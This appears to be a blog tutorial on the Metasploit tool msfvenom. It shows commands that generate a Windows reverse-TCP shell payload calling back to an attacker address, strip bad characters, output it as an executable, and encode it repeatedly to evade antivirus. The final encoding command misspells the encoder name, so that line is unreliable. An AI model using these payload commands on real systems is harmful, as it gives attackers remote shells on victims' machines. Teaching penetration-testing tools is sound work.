9th Day of Christmas: msfvenom
On the 9th Day of Christmas, Div0 gave to me ... msfvenom, searchsploit, urlcrazy, recon-ng, Zone Transfer Tool, Using Online Digest Databases, Hash Identification, Password Mutation Using JTR, and Custom Word List Generator (CeWL).
msfvenom is the successor of msfpayload and msfencode. Both msfpayload and msfencode are slated for retirement in the near future (Jun 2015). msfvenom consolidates the features of its predecessor and standardise its usage.
msfvenom is able to:
Generate shellcodes (i.e. msfpayload); and
Encode shellcodes into formats that can be easily deployed onto targets (i.e. msfencode).
msfvenom -l payloads
msfvenom -l encoders
To show available output formats:
Executable Formats: asp, aspx, aspx-exe, dll, elf, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war
Transform Formats: bash, c, csharp, dw, dword, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
msfvenom In Action: Generate windows/shell/reverse_tcp Payload
msfvenom -p windows/shell/reverse_tcp -o
For this demo, I will set LHOST as 192.168.1.100 and LPORT as 5555, and output the payload in Python format.
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -f python
Many times, there may be some bad characters in the payload that could cause the exploit to fail. One such example is the \x00 (null bytes). To remove them, we can use the -b options.
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -f python
We can also output the payload in executable format:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -f exe > shell-exe
1 round of shikata_ga_nai encoding is automatically applied. shikata_ga_nai is a polymorphic XOR additive feedback encoder. We can perform extra encoding to evade antivirus detection. To encode the payload with shitaka_ga_nai 10 times:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -e "x86/shitaka_ga_nai" -i 10 -f exe > shell-exe
VirusTotal scan result on the executable with 1 round of encoding:
VirusTotal scan result on the executable with 10 rounds of encoding:
Notice both payloads yield almost the same detection rate? This is because most antivirus knows the templates used by Metasploit.
Shared by Tan Jun Hao.